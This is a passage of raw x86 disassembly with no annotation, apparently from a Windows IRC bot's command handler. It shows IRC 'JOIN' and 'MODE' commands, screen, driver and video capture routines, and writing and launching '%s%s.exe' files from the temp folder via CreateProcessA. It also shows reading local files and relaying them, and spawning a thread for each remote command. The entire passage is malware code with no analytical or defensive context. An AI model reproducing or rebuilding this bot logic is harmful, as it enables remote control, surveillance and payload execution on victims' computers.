[ebp+var_2C4] push [ebp+arg_10] push offset unk_42A788 push 200h push eax call sub_41B980 add esp, 14h jmp short loc_40828C ; --------------------------------------------------------------------------- loc_40826C: ; CODE XREF: sub_401ACD+677Ej push offset dword_42A77C call sub_41814D pop ecx push eax lea eax, [ebp+var_2C4] push 200h push eax call sub_41B980 loc_408289: ; CODE XREF: sub_401ACD+2F2Bj ; sub_401ACD+5570j add esp, 0Ch loc_40828C: ; CODE XREF: sub_401ACD+2137j ; sub_401ACD+2ECDj ... cmp [ebp+var_8], ebx jnz loc_4083BD push ebx lea eax, [ebp+var_2C4] push [ebp+var_4] push eax push [ebp+var_88] push [ebp+arg_4] loc_4082A9: ; CODE XREF: sub_401ACD+57C7j call sub_409A73 add esp, 14h jmp loc_4083BD ; --------------------------------------------------------------------------- loc_4082B6: ; CODE XREF: sub_401ACD+4B28j ; sub_401ACD+4B3Fj push [ebp+arg_10] lea eax, [ebp+var_3F04] push 104h push eax call sub_41B980 add esp, 0Ch cmp [ebp+var_C], ebx jz short loc_4082F0 push edi push [ebp+var_C] call sub_41B900 pop ecx cmp eax, ebx pop ecx jz short loc_4082F0 push eax lea eax, [ebp+var_3E00] push eax call sub_41B886 pop ecx pop ecx loc_4082F0: ; CODE XREF: sub_401ACD+6803j ; sub_401ACD+6812j push [ebp+var_88] lea eax, [ebp+var_3F84] push 80h push eax call sub_41B980 mov eax, [ebp+arg_4] add esp, 0Ch mov [ebp+var_3F88], eax mov eax, [ebp+var_4] mov [ebp+var_3CF8], eax mov eax, [ebp+var_8] mov [ebp+var_3CF4], eax lea eax, [ebp+var_3E00] push eax lea eax, [ebp+var_3F04] push eax push offset unk_42A74C lea eax, [ebp+var_2C4] push 200h push eax call sub_41B980 push ebx lea eax, [ebp+var_2C4] push 24h push eax call sub_40B0F7 add esp, 20h mov [ebp+var_3CFC], eax lea eax, [ebp+var_10] push eax lea eax, [ebp+var_3F88] push ebx push eax push offset sub_416CAE push ebx push ebx call dword_42707C ; CreateThread mov ecx, [ebp+var_3CFC] imul ecx, 234h cmp eax, ebx mov dword_43E5A4[ecx], eax jz short loc_4083A2 loc_408390: ; CODE XREF: sub_401ACD+68D3j cmp [ebp+var_3CF0], ebx jnz short loc_4083BD push 32h call dword_427078 ; Sleep jmp short loc_408390 ; --------------------------------------------------------------------------- loc_4083A2: ; CODE XREF: sub_401ACD+68C1j call dword_42708C ; RtlGetLastWin32Error push eax push offset unk_42A710 loc_4083AE: ; CODE XREF: sub_401ACD+925j ; sub_401ACD+A63j ... lea eax, [ebp+var_2C4] push eax call sub_41B886 add esp, 0Ch loc_4083BD: ; CODE XREF: sub_401ACD+7E1j ; sub_401ACD+94Cj ... push 1 pop esi jmp loc_406D03 ; --------------------------------------------------------------------------- loc_4083C5: ; CODE XREF: sub_401ACD+4AFAj ; sub_401ACD+4B11j push 44h lea eax, [ebp+var_668] pop esi push esi push ebx push eax call sub_41B590 push 1 mov [ebp+var_668], esi pop esi mov [ebp+var_638], bx push [ebp+arg_10] mov [ebp+var_63C], esi call sub_41B779 add esp, 10h cmp eax, esi jnz short loc_408404 mov [ebp+var_638], 5 loc_408404: ; CODE XREF: sub_401ACD+692Cj cmp [ebp+var_C], ebx jz loc_406CDF push edi push [ebp+var_C] call sub_41B900 mov edi, eax pop ecx cmp edi, ebx pop ecx jz loc_406CDF lea eax, [ebp+var_E10] push eax lea eax, [ebp+var_668] push eax push ebx push ebx push 28h push esi push ebx push ebx push edi push ebx call dword_42706C ; CreateProcessA test eax, eax jnz short loc_40844D push offset unk_42A6EC jmp loc_4085D6 ; --------------------------------------------------------------------------- loc_40844D: ; CODE XREF: sub_401ACD+6974j push edi push offset dword_42A6D0 jmp loc_406CD0 ; --------------------------------------------------------------------------- loc_408458: ; CODE XREF: sub_401ACD+4ACCj ; sub_401ACD+4AE3j push edi push offset aQufpoius ; "qufpoius" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_4085D1 lea eax, [ebp+var_48F0] push eax push 104h call dword_4270B0 ; GetTempPathA push 0FFh lea eax, [ebp+var_25D0] push [ebp+arg_10] push eax call sub_41B5F0 lea eax, [ebp+var_17D0] push eax call sub_40AD81 add esp, 10h push eax lea eax, [ebp+var_48F0] push eax lea eax, [ebp+var_24D0] push offset aSS_exe ; "%s%s.exe" push eax call sub_41B886 mov eax, [ebp+esi+var_84] add esp, 10h cmp eax, ebx mov [ebp+var_23CC], 1 mov [ebp+var_23C8], ebx jz short loc_4084ED push 10h push ebx push eax call sub_41BDC5 add esp, 0Ch mov [ebp+var_23C0], eax jmp short loc_4084F3 ; --------------------------------------------------------------------------- loc_4084ED: ; CODE XREF: sub_401ACD+6A0Aj mov [ebp+var_23C0], ebx loc_4084F3: ; CODE XREF: sub_401ACD+6A1Ej mov esi, [ebp+esi+var_80] cmp esi, ebx jz short loc_40850A push esi call sub_41B779 pop ecx mov [ebp+var_23C4], eax jmp short loc_408510 ; --------------------------------------------------------------------------- loc_40850A: ; CODE XREF: sub_401ACD+6A2Cj mov [ebp+var_23C4], ebx loc_408510: ; CODE XREF: sub_401ACD+6A3Bj movzx eax, [ebp+var_8FB] mov esi, [ebp+arg_4] push 7Fh push [ebp+var_88] mov [ebp+var_23BC], eax lea eax, [ebp+var_2650] mov [ebp+var_2654], esi push eax call sub_41B5F0 mov eax, [ebp+var_4] add esp, 0Ch mov [ebp+var_23B4], eax mov eax, [ebp+var_8] push [ebp+arg_10] mov [ebp+var_23B8], eax lea eax, [ebp+var_2C4] push offset dword_42A698 push eax call sub_41B886 push esi lea eax, [ebp+var_2C4] push 1Eh push eax call sub_40B0F7 add esp, 18h mov [ebp+var_23D0], eax lea eax, [ebp+var_10] push eax lea eax, [ebp+var_2654] push ebx push eax push offset sub_4163FA push ebx push ebx call dword_42707C ; CreateThread mov ecx, [ebp+var_23D0] imul ecx, 234h cmp eax, ebx mov dword_43E5A4[ecx], eax jz short loc_4085C0 loc_4085AA: ; CODE XREF: sub_401ACD+6AF1j cmp [ebp+var_23B0], ebx jnz loc_406CDF push 32h call dword_427078 ; Sleep jmp short loc_4085AA ; --------------------------------------------------------------------------- loc_4085C0: ; CODE XREF: sub_401ACD+6ADBj call dword_42708C ; RtlGetLastWin32Error push eax push offset dword_42A65C jmp loc_406CD0 ; --------------------------------------------------------------------------- loc_4085D1: ; CODE XREF: sub_401ACD+699Aj push offset dword_42A614 loc_4085D6: ; CODE XREF: sub_401ACD+2E74j ; sub_401ACD+457Dj ... lea eax, [ebp+var_2C4] push eax call sub_41B886 pop ecx pop ecx jmp loc_406CDF ; --------------------------------------------------------------------------- loc_4085E9: ; CODE XREF: sub_401ACD+4A9Ej ; sub_401ACD+4AB5j push [ebp+var_8C] push offset dword_42D02C call sub_41C070 pop ecx test eax, eax pop ecx jz loc_401E94 cmp [ebp+var_C], ebx jz loc_401E94 push edi push [ebp+var_C] call sub_41B900 pop ecx pop ecx push eax lea eax, [ebp+var_2C4] push [ebp+var_88] push [ebp+var_8C] push [ebp+var_90] push offset dword_42A604 push eax call sub_41B886 lea eax, [ebp+var_2C4] push 1FFh push eax push [ebp+arg_0] call sub_41B5F0 push [ebp+arg_10] call sub_41B779 add esp, 28h test eax, eax jle short loc_408674 push [ebp+arg_10] call sub_41B779 imul eax, 3E8h pop ecx push eax call dword_427078 ; Sleep loc_408674: ; CODE XREF: sub_401ACD+6B8Fj push offset dword_42A5F0 call sub_4151AD mov eax, [ebp+arg_24] pop ecx inc eax jmp loc_401E97 ; --------------------------------------------------------------------------- loc_408688: ; CODE XREF: sub_401ACD+4A70j ; sub_401ACD+4A87j push [ebp+var_8C] push offset dword_42D02C call sub_41C070 pop ecx test eax, eax pop ecx jz loc_401E94 cmp [ebp+var_C], ebx jz loc_409855 push edi push [ebp+var_C] call sub_41B900 inc edi push offset aRepeat ; "repeat" push edi mov esi, eax call sub_41C070 add esp, 10h test eax, eax push esi jz short loc_408746 push [ebp+var_88] lea eax, [ebp+var_2C4] push [ebp+var_8C] push [ebp+var_90] push offset dword_42A604 push eax call sub_41B886 lea eax, [ebp+var_2C4] push 1FFh push eax push [ebp+arg_0] call sub_41B5F0 add esp, 24h lea eax, [ebp+var_2C4] push esi push offset dword_42A5D8 push eax call sub_41B886 lea eax, [ebp+var_2C4] push eax call sub_4151AD push [ebp+arg_10] call sub_41B779 add esp, 14h test eax, eax jle loc_409855 push [ebp+arg_10] call sub_41B779 add eax, [ebp+arg_24] pop ecx jmp loc_401E97 ; --------------------------------------------------------------------------- loc_408746: ; CODE XREF: sub_401ACD+6BFBj push offset unk_42A5A4 loc_40874B: ; CODE XREF: sub_401ACD+7543j lea eax, [ebp+var_2C4] push eax call sub_41B886 add esp, 0Ch loc_40875A: ; CODE XREF: sub_401ACD+74CBj ; sub_401ACD+7624j cmp [ebp+var_8], ebx jnz short loc_40877B push ebx lea eax, [ebp+var_2C4] push [ebp+var_4] push eax push [ebp+var_88] push [ebp+arg_4] call sub_409A73 add esp, 14h loc_40877B: ; CODE XREF: sub_401ACD+6C90j ; sub_401ACD+72C8j ... lea eax, [ebp+var_2C4] push eax call sub_4151AD jmp loc_409854 ; --------------------------------------------------------------------------- loc_40878C: ; CODE XREF: sub_401ACD+4A42j ; sub_401ACD+4A59j push 7Fh lea eax, [ebp+var_2214] push [ebp+arg_10] push eax call sub_41B5F0 push 7Fh lea eax, [ebp+var_2194] push edi push eax call sub_41B5F0 push 7Fh lea eax, [ebp+var_2114] push [ebp+var_88] push eax call sub_41B5F0 mov eax, [ebp+var_4] add esp, 24h mov esi, [ebp+arg_4] mov [ebp+var_2090], eax mov eax, [ebp+var_8] push edi push [ebp+arg_10] mov [ebp+var_208C], eax lea eax, [ebp+var_2C4] mov [ebp+var_2218], esi push offset unk_42A570 push eax call sub_41B886 push ebx lea eax, [ebp+var_2C4] push 0Fh push eax call sub_40B0F7 add esp, 1Ch mov [ebp+var_2094], eax lea eax, [ebp+var_10] push eax lea eax, [ebp+var_2218] push ebx push eax push offset sub_4143CC push ebx push ebx call dword_42707C ; CreateThread mov ecx, [ebp+var_2094] imul ecx, 234h cmp eax, ebx mov dword_43E5A4[ecx], eax jz short loc_40884C loc_40883A: ; CODE XREF: sub_401ACD+6D7Dj cmp [ebp+var_2088], ebx jnz short loc_408867 push 32h call dword_427078 ; Sleep jmp short loc_40883A ; --------------------------------------------------------------------------- loc_40884C: ; CODE XREF: sub_401ACD+6D6Bj call dword_42708C ; RtlGetLastWin32Error push eax push offset unk_42A534 loc_408858: ; CODE XREF: sub_401ACD+6E8Aj lea eax, [ebp+var_2C4] push eax call sub_41B886 add esp, 0Ch loc_408867: ; CODE XREF: sub_401ACD+6D73j ; sub_401ACD+6E6Ej cmp [ebp+var_8], ebx jnz loc_409631 push ebx lea eax, [ebp+var_2C4] push [ebp+var_4] push eax push [ebp+var_88] push esi jmp loc_409629 ; --------------------------------------------------------------------------- loc_408887: ; CODE XREF: sub_401ACD+4A14j ; sub_401ACD+4A2Bj push 7Fh lea eax, [ebp+var_23A8] push [ebp+arg_10] push eax call sub_41B5F0 push 7Fh lea eax, [ebp+var_2328] push edi push eax call sub_41B5F0 push 7Fh lea eax, [ebp+var_22A8] push [ebp+var_88] push eax call sub_41B5F0 mov eax, [ebp+var_4] add esp, 24h mov esi, [ebp+arg_4] mov [ebp+var_2224], eax mov eax, [ebp+var_8] push edi push [ebp+arg_10] mov [ebp+var_2220], eax lea eax, [ebp+var_2C4] mov [ebp+var_23AC], esi push offset dword_42A508 push eax call sub_41B886 push ebx lea eax, [ebp+var_2C4] push 11h push eax call sub_40B0F7 add esp, 1Ch mov [ebp+var_2228], eax lea eax, [ebp+var_10] push eax lea eax, [ebp+var_23AC] push ebx push eax push offset sub_413B78 push ebx push ebx call dword_42707C ; CreateThread mov ecx, [ebp+var_2228] imul ecx, 234h cmp eax, ebx mov dword_43E5A4[ecx], eax jz short loc_40894B loc_408935: ; CODE XREF: sub_401ACD+6E7Cj cmp [ebp+var_221C], ebx jnz loc_408867 push 32h call dword_427078 ; Sleep jmp short loc_408935 ; --------------------------------------------------------------------------- loc_40894B: ; CODE XREF: sub_401ACD+6E66j call dword_42708C ; RtlGetLastWin32Error push eax push offset dword_42A4CC jmp loc_408858 ; --------------------------------------------------------------------------- loc_40895C: ; CODE XREF: sub_401ACD+49E6j ; sub_401ACD+49FDj push edi lea eax, [ebp+var_2C4] push offset dword_42A4C4 push eax call sub_41B886 push [ebp+arg_10] call sub_41B779 add esp, 10h loc_408979: ; CODE XREF: sub_401ACD+6F17j test eax, eax jle loc_409855 push [ebp+arg_10] call sub_41B779 cmp eax, 400h pop ecx jge loc_409855 loc_408995: ; CODE XREF: sub_401ACD+7A56j lea eax, [ebp+var_2C4] push eax push offset dword_42A4BC push [ebp+arg_10] call sub_41B779 imul eax, 234h pop ecx push dword_43E59C[eax] call sub_409A2D jmp loc_404934 ; --------------------------------------------------------------------------- loc_4089C0: ; CODE XREF: sub_401ACD+49B8j ; sub_401ACD+49CFj push [ebp+esi+var_84] lea eax, [ebp+var_2C4] push edi push offset dword_42A4B0 push eax call sub_41B886 push [ebp+arg_10] call sub_41B779 add esp, 14h jmp short loc_408979 ; --------------------------------------------------------------------------- loc_4089E6: ; CODE XREF: sub_401ACD+498Aj ; sub_401ACD+49A1j push edi lea eax, [ebp+var_2C4] push offset dword_42BB5C push eax call sub_41B886 mov esi, [ebp+arg_10] push esi call sub_41B779 add esp, 10h test eax, eax jle loc_409855 push esi call sub_41B779 cmp eax, 400h pop ecx jge loc_409855 lea eax, [ebp+var_2C4] push eax push offset dword_42A4BC push esi call sub_41B779 imul eax, 234h pop ecx push dword_43E59C[eax] call sub_409A2D add esp, 0Ch push edi push esi push offset dword_42A494 loc_408A4C: ; CODE XREF: sub_401ACD+700Aj ; sub_401ACD+7079j ... call sub_415221 jmp loc_404934 ; --------------------------------------------------------------------------- loc_408A56: ; CODE XREF: sub_401ACD+495Cj ; sub_401ACD+4973j cmp [ebp+var_C], ebx jz loc_409855 push edi push [ebp+var_C] call sub_41B900 mov esi, eax pop ecx cmp esi, ebx pop ecx jz short loc_408A85 push esi lea eax, [ebp+var_2C4] push offset dword_42A48C push eax call sub_41B886 add esp, 0Ch loc_408A85: ; CODE XREF: sub_401ACD+6FA1j mov edi, [ebp+arg_10] push edi call sub_41B779 test eax, eax pop ecx jle loc_409855 push edi call sub_41B779 cmp eax, 400h pop ecx jge loc_409855 lea eax, [ebp+var_2C4] push eax push offset dword_42A4BC push edi call sub_41B779 imul eax, 234h pop ecx push dword_43E59C[eax] call sub_409A2D add esp, 0Ch push esi push edi push offset dword_42A470 jmp loc_408A4C ; --------------------------------------------------------------------------- loc_408ADC: ; CODE XREF: sub_401ACD+492Ej ; sub_401ACD+4945j cmp [ebp+var_C], ebx jz loc_409855 push edi push [ebp+var_C] call sub_41B900 mov esi, eax pop ecx cmp esi, ebx pop ecx jz loc_409855 mov edi, [ebp+arg_10] push edi call sub_41B779 test eax, eax pop ecx jle loc_409855 push edi call sub_41B779 cmp eax, 400h pop ecx jge loc_409855 push esi push offset dword_42A4BC push edi call sub_41B779 imul eax, 234h pop ecx push dword_43E59C[eax] call sub_409A2D add esp, 0Ch push esi push edi push offset dword_42A454 jmp loc_408A4C ; --------------------------------------------------------------------------- loc_408B4B: ; CODE XREF: sub_401ACD+4900j ; sub_401ACD+4917j cmp [ebp+var_C], ebx jz loc_409855 push [ebp+arg_10] push [ebp+var_C] call sub_41B900 mov esi, eax pop ecx cmp esi, ebx pop ecx jz loc_409855 push esi push offset aModeS ; "MODE %s\r\n" push [ebp+arg_4] call sub_409A2D add esp, 0Ch push esi push offset unk_42A42C jmp loc_40984E ; --------------------------------------------------------------------------- loc_408B87: ; CODE XREF: sub_401ACD+48D2j ; sub_401ACD+48E9j push [ebp+var_8C] push offset dword_42D02C call sub_41C070 pop ecx test eax, eax pop ecx jz loc_401E94 push edi push offset dword_42A420 push [ebp+arg_4] call sub_409A2D push [ebp+arg_10] call sub_41B779 imul eax, 3E8h add esp, 10h push eax call dword_427078 ; Sleep push [ebp+esi+var_84] push edi push offset aJoinSS ; "JOIN %s %s\r\n" push [ebp+arg_4] call sub_409A2D push offset dword_42A40C call sub_4151AD jmp loc_403520 ; --------------------------------------------------------------------------- loc_408BEB: ; CODE XREF: sub_401ACD+48A4j ; sub_401ACD+48BBj cmp [ebp+var_C], ebx jz loc_409855 push [ebp+arg_10] call sub_41AFE0 push [ebp+arg_8] mov esi, eax call sub_41AFE0 add eax, [ebp+var_C] push edi lea eax, [eax+esi+2] push eax call sub_41B900 mov esi, eax add esp, 10h cmp esi, ebx jz loc_409855 push esi lea eax, [ebp+var_2C4] push offset dword_42AB40 push eax call sub_41B886 push ebx lea eax, [ebp+var_2C4] push ebx push eax push [ebp+arg_10] push [ebp+arg_4] call sub_409A73 add esp, 20h push esi push [ebp+arg_10] push offset unk_42A3F0 jmp loc_408A4C ; --------------------------------------------------------------------------- loc_408C58: ; CODE XREF: sub_401ACD+4876j ; sub_401ACD+488Dj cmp [ebp+var_C], ebx jz loc_409855 push [ebp+arg_10] call sub_41AFE0 push [ebp+arg_8] mov esi, eax call sub_41AFE0 add eax, [ebp+var_C] push edi lea eax, [eax+esi+2] push eax call sub_41B900 mov esi, eax add esp, 10h cmp esi, ebx jz loc_409855 push ebx push ebx push esi push [ebp+arg_10] push [ebp+arg_4] call sub_409A73 add esp, 14h push esi push [ebp+arg_10] push offset unk_42A3D0 jmp loc_408A4C ; --------------------------------------------------------------------------- loc_408CAD: ; CODE XREF: sub_401ACD+4848j ; sub_401ACD+485Fj cmp [ebp+var_C], ebx jz loc_401E94 push edi push [ebp+var_C] call sub_41B900 pop ecx cmp eax, ebx pop ecx jz loc_401E94 push eax push [ebp+arg_10] call sub_4150B5 pop ecx pop ecx push [ebp+arg_10] push offset unk_42A3B0 loc_408CDC: ; CODE XREF: sub_401ACD+5853j ; sub_401ACD+7B2Bj lea eax, [ebp+var_2C4] push eax call sub_41B886 add esp, 0Ch jmp loc_409610 ; --------------------------------------------------------------------------- loc_408CF0: ; CODE XREF: sub_401ACD+481Aj ; sub_401ACD+4831j push edi push [ebp+arg_10] push [ebp+var_4] push [ebp+var_88] push [ebp+arg_4] call sub_4184E2 jmp loc_4040FD ; --------------------------------------------------------------------------- loc_408D0A: ; CODE XREF: sub_401ACD+47DCj ; sub_401ACD+47F1j push [ebp+arg_10] push [ebp+arg_1C] call sub_41B900 pop ecx test eax, eax pop ecx jz loc_409855 mov esi, [ebp+esi+var_88] cmp esi, ebx jz loc_408DB2 push esi push [ebp+var_C] call sub_41B900 mov esi, eax pop ecx cmp esi, ebx pop ecx jz short loc_408D9A push esi lea eax, [ebp+var_2C4] push [ebp+var_88] push [ebp+var_8C] push [ebp+var_90] push offset dword_42A604 push eax call sub_41B886 lea eax, [ebp+var_2C4] push 1FFh push eax push [ebp+arg_0] call sub_41B5F0 add esp, 24h lea eax, [ebp+var_2C4] push esi push [ebp+arg_10] push offset unk_42A388 push eax call sub_41B886 add esp, 10h inc [ebp+arg_24] jmp loc_40877B ; --------------------------------------------------------------------------- loc_408D9A: ; CODE XREF: sub_401ACD+7270j lea eax, [ebp+var_2C4] push offset unk_42A358 push eax call sub_41B886 pop ecx pop ecx jmp loc_40877B ; --------------------------------------------------------------------------- loc_408DB2: ; CODE XREF: sub_401ACD+725Bj push ebx lea eax, [ebp+var_2C4] push [ebp+var_4] push [ebp+arg_4] push [ebp+arg_1C] push eax call sub_41ACF7 add esp, 0Ch push eax push [ebp+var_88] push [ebp+arg_4] call sub_409A73 add esp, 14h lea eax, [ebp+var_2C4] push [ebp+arg_10] push offset dword_42A33C push 200h push eax call sub_41B980 add esp, 10h jmp loc_40877B ; --------------------------------------------------------------------------- loc_408DFE: ; CODE XREF: sub_401ACD+47B2j ; sub_401ACD+47C7j push offset aScreen ; "screen" push [ebp+arg_10] call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_408E59 mov edi, [ebp+esi+var_88] cmp edi, ebx jz short loc_408E46 push edi call sub_4153BD cmp eax, 1 pop ecx jnz short loc_408E3F push edi lea eax, [ebp+var_2C4] push offset unk_42A308 push eax call sub_41B886 add esp, 0Ch jmp short loc_408E59 ; --------------------------------------------------------------------------- loc_408E3F: ; CODE XREF: sub_401ACD+7359j push offset unk_42A2D8 jmp short loc_408E4B ; --------------------------------------------------------------------------- loc_408E46: ; CODE XREF: sub_401ACD+734Dj push offset unk_42A29C loc_408E4B: ; CODE XREF: sub_401ACD+7377j lea eax, [ebp+var_2C4] push eax call sub_41B886 pop ecx pop ecx loc_408E59: ; CODE XREF: sub_401ACD+7342j ; sub_401ACD+7370j push offset aDrivers ; "drivers" push [ebp+arg_10] call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_408EE6 xor edi, edi loc_408E6E: ; CODE XREF: sub_401ACD+7404j lea eax, [ebp+var_53F8] push 1FFh push eax lea eax, [ebp+var_4EF0] push 0FFh push eax push edi call ds:dword_4CB684 test eax, eax jz short loc_408ECD lea eax, [ebp+var_53F8] push eax lea eax, [ebp+var_4EF0] push eax push edi lea eax, [ebp+var_5D88] push offset unk_42A26C push eax call sub_41B886 push ebx lea eax, [ebp+var_5D88] push [ebp+var_4] push eax push [ebp+var_88] push [ebp+arg_4] call sub_409A73 add esp, 28h loc_408ECD: ; CODE XREF: sub_401ACD+73C2j inc edi cmp edi, 0Ah jl short loc_408E6E lea eax, [ebp+var_2C4] push offset unk_42A244 push eax call sub_41B886 pop ecx pop ecx loc_408EE6: ; CODE XREF: sub_401ACD+739Dj push offset aFrame ; "frame" push [ebp+arg_10] call sub_41C070 pop ecx test eax, eax pop ecx jnz loc_408F87 cmp [ebp+esi+var_88], ebx jz short loc_408F74 cmp [ebp+esi+var_84], ebx jz short loc_408F74 mov edi, [ebp+esi+var_80] cmp edi, ebx jz short loc_408F74 mov eax, [ebp+esi+var_7C] cmp eax, ebx jz short loc_408F74 push eax call sub_41B779 pop ecx push eax push edi call sub_41B779 pop ecx push eax push [ebp+esi+var_84] call sub_41B779 pop ecx push eax push [ebp+esi+var_88] call sub_4155F8 add esp, 10h test eax, eax jnz short loc_408F6D push [ebp+esi+var_88] lea eax, [ebp+var_2C4] push offset unk_42A210 push eax call sub_41B886 add esp, 0Ch jmp short loc_408F87 ; --------------------------------------------------------------------------- loc_408F6D: ; CODE XREF: sub_401ACD+7481j push offset unk_42A1DC jmp short loc_408F79 ; --------------------------------------------------------------------------- loc_408F74: ; CODE XREF: sub_401ACD+7437j ; sub_401ACD+7440j ... push offset unk_42A1A4 loc_408F79: ; CODE XREF: sub_401ACD+74A5j lea eax, [ebp+var_2C4] push eax call sub_41B886 pop ecx pop ecx loc_408F87: ; CODE XREF: sub_401ACD+742Aj ; sub_401ACD+749Ej push offset aVideo ; "video" push [ebp+arg_10] call sub_41C070 pop ecx test eax, eax pop ecx jnz loc_40875A mov eax, [ebp+esi+var_88] cmp eax, ebx mov [ebp+arg_1C], eax jz short loc_40901F mov eax, [ebp+esi+var_84] cmp eax, ebx mov [ebp+arg_0], eax jz short loc_40901F mov eax, [ebp+esi+var_80] cmp eax, ebx mov [ebp+arg_18], eax jz short loc_40901F mov edi, [ebp+esi+var_7C] cmp edi, ebx jz short loc_40901F mov esi, [ebp+esi+var_78] cmp esi, ebx jz short loc_40901F push esi call sub_41B779 pop ecx push eax push edi call sub_41B779 pop ecx push eax push [ebp+arg_18] call sub_41B779 pop ecx push eax push [ebp+arg_0] call sub_41B779 pop ecx push eax push [ebp+arg_1C] call sub_4157F1 add esp, 14h test eax, eax jnz short loc_409015 push [ebp+arg_1C] push offset unk_42A170 jmp loc_40874B ; --------------------------------------------------------------------------- loc_409015: ; CODE XREF: sub_401ACD+7539j push offset unk_42A130 jmp loc_4090E3 ; --------------------------------------------------------------------------- loc_40901F: ; CODE XREF: sub_401ACD+74DDj ; sub_401ACD+74EBj ... push offset unk_42A0F0 jmp loc_4090E3 ; --------------------------------------------------------------------------- loc_409029: ; CODE XREF: sub_401ACD+4042j ; sub_401ACD+4057j push offset aR ; "r" push [ebp+arg_10] call sub_41B4C2 mov edi, eax pop ecx cmp edi, ebx pop ecx jz short loc_409099 mov esi, 200h push edi lea eax, [ebp+var_2C4] push esi push eax call sub_41BB4F add esp, 0Ch loc_409054: ; CODE XREF: sub_401ACD+75B6j test eax, eax jz short loc_409085 push 1 lea eax, [ebp+var_2C4] push [ebp+var_4] push eax push [ebp+var_88] push [ebp+arg_4] call sub_409A73 push edi lea eax, [ebp+var_2C4] push esi push eax call sub_41BB4F add esp, 20h jmp short loc_409054 ; --------------------------------------------------------------------------- loc_409085: ; CODE XREF: sub_401ACD+7589j push edi call sub_41B05B pop ecx push [ebp+arg_10] push offset unk_42A0CC jmp loc_409227 ; --------------------------------------------------------------------------- loc_409099: ; CODE XREF: sub_401ACD+756Fj push [ebp+arg_10] push offset unk_42A0A8 jmp loc_406CD0 ; --------------------------------------------------------------------------- loc_4090A6: ; CODE XREF: sub_401ACD+4018j ; sub_401ACD+402Dj cmp [ebp+var_C], ebx jz loc_409855 push [ebp+arg_10] push [ebp+var_C] call sub_41B900 mov esi, eax pop ecx cmp esi, ebx pop ecx jz loc_409855 push offset asc_42A0A4 ; "\n" push esi call sub_41BEC0 push esi call sub_419A51 add esp, 0Ch test eax, eax jnz short loc_4090F6 push offset unk_42A078 loc_4090E3: ; CODE XREF: sub_401ACD+754Dj ; sub_401ACD+7557j ... lea eax, [ebp+var_2C4] push eax call sub_41B886 pop ecx pop ecx jmp loc_40875A ; --------------------------------------------------------------------------- loc_4090F6: ; CODE XREF: sub_401ACD+760Fj push esi lea eax, [ebp+var_2C4] push offset dword_42A060 push eax call sub_41B886 add esp, 0Ch jmp loc_40877B ; --------------------------------------------------------------------------- loc_409110: ; CODE XREF: sub_401ACD+3FEEj ; sub_401ACD+4003j cmp [ebp+var_C], ebx jz loc_409855 push [ebp+arg_10] push [ebp+var_C] call sub_41B900 pop ecx cmp eax, ebx pop ecx jz loc_409855 push eax call sub_418212 test eax, eax pop ecx jnz short loc_409140 push offset unk_42A040 jmp short loc_4090E3 ; --------------------------------------------------------------------------- loc_409140: ; CODE XREF: sub_401ACD+766Aj push offset dword_42A024 jmp short loc_4090E3 ; --------------------------------------------------------------------------- loc_409147: ; CODE XREF: sub_401ACD+3FC4j ; sub_401ACD+3FD9j push 7Fh lea eax, [ebp+var_2080] push [ebp+arg_10] push eax call sub_41B5F0 mov esi, [ebp+esi+var_88] add esp, 0Ch cmp esi, ebx jz short loc_409178 push 7Fh lea eax, [ebp+var_2000] push esi push eax call sub_41B5F0 add esp, 0Ch loc_409178: ; CODE XREF: sub_401ACD+7697j push 7Fh lea eax, [ebp+var_1F80] push [ebp+var_88] push eax call sub_41B5F0 mov eax, [ebp+arg_4] add esp, 0Ch mov [ebp+var_2084], eax mov eax, [ebp+var_8] push [ebp+arg_10] mov [ebp+var_1EFC], eax mov eax, [ebp+var_4] mov [ebp+var_1EF8], eax lea eax, [ebp+var_2C4] push offset dword_42A00C push eax call sub_41B886 push ebx lea eax, [ebp+var_2C4] push 1Ch push eax call sub_40B0F7 add esp, 18h mov [ebp+var_1F00], eax lea eax, [ebp+var_10] push eax lea eax, [ebp+var_2084] push ebx push eax push offset sub_41ADB6 push ebx push ebx call dword_42707C ; CreateThread mov ecx, [ebp+var_1F00] imul ecx, 234h cmp eax, ebx mov dword_43E5A4[ecx], eax jz short loc_40921B loc_409205: ; CODE XREF: sub_401ACD+774Cj cmp [ebp+var_1EF4], ebx jnz loc_406D00 push 32h call dword_427078 ; Sleep jmp short loc_409205 ; --------------------------------------------------------------------------- loc_40921B: ; CODE XREF: sub_401ACD+7736j call dword_42708C ; RtlGetLastWin32Error push eax push offset unk_429FCC loc_409227: ; CODE XREF: sub_401ACD+29CFj ; sub_401ACD+75C7j lea eax, [ebp+var_2C4] push eax call sub_41B886 add esp, 0Ch jmp loc_406D00 ; --------------------------------------------------------------------------- loc_40923B: ; CODE XREF: sub_401ACD+3F9Aj ; sub_401ACD+3FAFj push ebx push [ebp+var_88] push [ebp+arg_4] push [ebp+arg_10] call sub_40F96B add esp, 10h push [ebp+arg_10] push offset dword_429FB4 jmp loc_40984E ; --------------------------------------------------------------------------- loc_40925D: ; CODE XREF: sub_401ACD+3F70j ; sub_401ACD+3F85j push 14h lea eax, [ebp+var_1D48] push ebx push eax call sub_41B590 add esp, 0Ch lea eax, [ebp+var_1D34] push [ebp+arg_10] push offset aS_2 ; "%s" push eax call sub_41B886 mov eax, [ebp+arg_4] add esp, 0Ch mov [ebp+var_1D50], eax lea eax, [ebp+var_C4] push eax lea eax, [ebp+var_1C30] push 80h push eax call sub_41B980 mov eax, [ebp+var_4] add esp, 0Ch mov [ebp+var_1BA8], eax mov eax, [ebp+var_8] mov [ebp+var_1BA4], eax lea eax, [ebp+var_1C30] push eax lea eax, [ebp+var_1D34] push eax lea eax, [ebp+var_2C4] push offset unk_429F90 push eax call sub_41B886 push ebx lea eax, [ebp+var_2C4] push 1Ah push eax call sub_40B0F7 add esp, 1Ch mov [ebp+var_1BAC], eax lea eax, [ebp+var_10] push eax lea eax, [ebp+var_1D50] push ebx push eax push offset sub_415E1B push ebx push ebx call dword_42707C ; CreateThread mov ecx, [ebp+var_1BAC] imul ecx, 234h cmp eax, ebx mov dword_43E5A4[ecx], eax jz loc_4023E6 loc_409326: ; CODE XREF: sub_401ACD+786Dj cmp [ebp+var_1BA0], ebx jnz loc_4083BD push 32h call dword_427078 ; Sleep jmp short loc_409326 ; --------------------------------------------------------------------------- loc_40933C: ; CODE XREF: sub_401ACD+3F46j ; sub_401ACD+3F5Bj push [ebp+arg_10] call dword_427080 ; 